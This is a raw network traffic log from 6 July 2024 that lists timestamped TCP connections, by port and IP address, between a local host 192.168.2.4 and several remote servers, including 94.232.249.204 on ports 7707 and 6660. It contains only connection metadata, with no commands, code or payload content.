                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.879398108 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.940104008 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.018897057 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.081592083 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.088663101 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.089844942 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.096091032 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.159303904 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.236946106 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.415488005 CEST8049854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.415633917 CEST8049854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.415738106 CEST4985480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.419182062 CEST4985480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.535742998 CEST4985580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.540703058 CEST8049855188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.543922901 CEST4985580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.543922901 CEST4985580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.549971104 CEST8049855188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.555844069 CEST4985580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.563659906 CEST8049855188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.767956972 CEST66604985294.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:26.768016100 CEST498526660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.424565077 CEST8049855188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.425307989 CEST8049855188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.425354958 CEST4985580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.428147078 CEST4985580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.534673929 CEST4985680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.540786028 CEST8049856188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.540847063 CEST4985680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.540889978 CEST4985680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.545917988 CEST8049856188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.545969963 CEST4985680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.551208973 CEST8049856188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.649852991 CEST49857443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.649873972 CEST44349857188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.650230885 CEST49857443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.653630018 CEST49857443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.653645039 CEST44349857188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.654366970 CEST49858443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.654391050 CEST44349858162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.655771971 CEST49858443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.656131029 CEST49858443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.656142950 CEST44349858162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.702786922 CEST49859443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.702801943 CEST44349859162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.702922106 CEST49859443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.703077078 CEST49859443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:27.703080893 CEST44349859162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.137713909 CEST44349857188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.137835979 CEST49857443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.139743090 CEST49857443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.139750957 CEST44349857188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.139993906 CEST44349857188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.180561066 CEST49857443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.312266111 CEST44349858162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.315751076 CEST49858443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.315779924 CEST44349858162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.319858074 CEST49858443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.321388960 CEST49858443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.321394920 CEST44349858162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.321604967 CEST44349858162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.337816954 CEST8049856188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.338095903 CEST8049856188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.341187000 CEST4985680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.341187000 CEST4985680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.356246948 CEST44349859162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.359836102 CEST49859443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.359848976 CEST44349859162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.361102104 CEST49858443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.361107111 CEST49857443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.362091064 CEST49859443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.362091064 CEST49859443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.362098932 CEST44349859162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.362310886 CEST44349859162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.367742062 CEST49859443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.404503107 CEST44349857188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.408504009 CEST44349859162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.408505917 CEST44349858162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.456335068 CEST4986080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.461549044 CEST8049860188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.461699009 CEST4986080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.461699009 CEST4986080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.466372013 CEST44349857188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.466434002 CEST44349857188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.466590881 CEST8049860188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.466675997 CEST4986080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.466676950 CEST49857443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.467742920 CEST49857443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.471852064 CEST8049860188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.506541967 CEST49861443192.168.2.4172.67.209.71
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.506573915 CEST44349861172.67.209.71192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.506845951 CEST49861443192.168.2.4172.67.209.71
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.507016897 CEST49861443192.168.2.4172.67.209.71
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.507030010 CEST44349861172.67.209.71192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.883445978 CEST44349858162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.883498907 CEST44349858162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.883544922 CEST49858443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.895231009 CEST49858443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.928188086 CEST49862443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.928205967 CEST44349862162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.928268909 CEST49862443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.928553104 CEST49862443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.928563118 CEST44349862162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.928894043 CEST44349859162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.928960085 CEST44349859162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.928999901 CEST49859443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.929485083 CEST49859443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.963222980 CEST49863443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.963269949 CEST44349863162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.963337898 CEST49863443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.963679075 CEST49863443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.963692904 CEST44349863162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.972254992 CEST44349861172.67.209.71192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.972323895 CEST49861443192.168.2.4172.67.209.71
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.974025011 CEST49861443192.168.2.4172.67.209.71
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.974031925 CEST44349861172.67.209.71192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.974257946 CEST44349861172.67.209.71192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:28.975646973 CEST49861443192.168.2.4172.67.209.71
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.016539097 CEST44349861172.67.209.71192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.113188982 CEST44349861172.67.209.71192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.113248110 CEST44349861172.67.209.71192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.113287926 CEST49861443192.168.2.4172.67.209.71
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.113301992 CEST44349861172.67.209.71192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.113362074 CEST44349861172.67.209.71192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.113404989 CEST49861443192.168.2.4172.67.209.71
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.113698006 CEST49861443192.168.2.4172.67.209.71
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.580974102 CEST44349862162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.583456039 CEST49862443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.583466053 CEST44349862162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.609265089 CEST44349863162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.618982077 CEST49863443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:29.618999004 CEST44349863162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.128591061 CEST8049860188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.128695011 CEST8049860188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.129106045 CEST4986080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.132627010 CEST4986080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.138117075 CEST44349862162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.138170958 CEST44349862162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.138230085 CEST49862443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.138698101 CEST49862443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.237464905 CEST4986480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.242542028 CEST8049864188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.242626905 CEST4986480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.242759943 CEST4986480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.247728109 CEST8049864188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.247777939 CEST4986480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.252711058 CEST8049864188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.439471960 CEST44349863162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.439532995 CEST44349863162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.439589024 CEST49863443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.440033913 CEST49863443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.474232912 CEST49865443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.474253893 CEST44349865162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.474410057 CEST49865443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.474730015 CEST49865443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.474744081 CEST44349865162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.509563923 CEST49866443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.509572983 CEST44349866162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.509788990 CEST49866443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.510040998 CEST49866443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.510052919 CEST44349866162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.961313963 CEST8049864188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.962924957 CEST8049864188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.962984085 CEST4986480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:30.964732885 CEST4986480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.065959930 CEST4986780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.071254015 CEST8049867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.071326971 CEST4986780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.071362972 CEST4986780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.076524973 CEST8049867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.076598883 CEST4986780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.081747055 CEST8049867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.129422903 CEST44349865162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.135102034 CEST49865443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.135119915 CEST44349865162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.144392967 CEST44349866162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.146049976 CEST49866443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.146056890 CEST44349866162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.784235954 CEST498526660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.784677029 CEST498686660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.908749104 CEST8049867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.908766031 CEST8049867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.908773899 CEST8049867188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.908849001 CEST44349866162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.908854008 CEST4986780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.908900976 CEST44349866162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.909095049 CEST44349865162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.909126997 CEST49866443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.909149885 CEST44349865162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.909452915 CEST66604985294.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.909465075 CEST66604986894.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.909482002 CEST49865443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:31.909666061 CEST498686660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.063143015 CEST4986780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.065788031 CEST49866443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.077805042 CEST49865443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.096065044 CEST498686660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.101001024 CEST66604986894.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.142023087 CEST49869443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.142070055 CEST44349869162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.142180920 CEST49869443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.142577887 CEST49869443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.142591000 CEST44349869162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.175066948 CEST4987080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.180272102 CEST8049870188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.180366039 CEST4987080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.180434942 CEST4987080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.185386896 CEST8049870188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.185480118 CEST4987080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.190362930 CEST8049870188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.938951969 CEST8049870188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.938970089 CEST8049870188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.939033985 CEST4987080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.940809011 CEST44349869162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.943713903 CEST4987080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.944897890 CEST49869443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:32.944931030 CEST44349869162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.052584887 CEST4987180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.057600021 CEST8049871188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.057666063 CEST4987180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.057733059 CEST4987180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.062513113 CEST8049871188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.062560081 CEST4987180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.067414999 CEST8049871188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.519475937 CEST44349869162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.519531965 CEST44349869162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.519582033 CEST49869443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.519989014 CEST49869443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.535635948 CEST49872443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.535665035 CEST44349872162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.535726070 CEST49872443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.535984993 CEST49872443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.536003113 CEST44349872162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.549087048 CEST66604986894.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.549143076 CEST498686660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.806818008 CEST8049871188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.807092905 CEST8049871188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.807284117 CEST4987180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.810621023 CEST4987180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.925812960 CEST4987380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.930660009 CEST8049873188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.930753946 CEST4987380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.931746006 CEST4987380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.936672926 CEST8049873188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.939966917 CEST4987380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:33.944931030 CEST8049873188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.193811893 CEST44349872162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.196048975 CEST49872443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.196069002 CEST44349872162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.751178026 CEST44349872162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.751241922 CEST44349872162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.751298904 CEST49872443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.751674891 CEST49872443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.772316933 CEST8049873188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.773698092 CEST8049873188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.773750067 CEST4987380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.775906086 CEST4987380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.855087996 CEST49874443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.855120897 CEST44349874162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.855192900 CEST49874443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.855453014 CEST49874443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.855467081 CEST44349874162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:34.878463030 CEST4987580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.333213091 CEST8049875188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.333287001 CEST4987580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.333379030 CEST4987580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.338160038 CEST8049875188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.338249922 CEST4987580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.343223095 CEST8049875188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.502460957 CEST44349874162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.504286051 CEST49874443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:28:35.504307985 CEST44349874162.125.66.15192.168.2.4
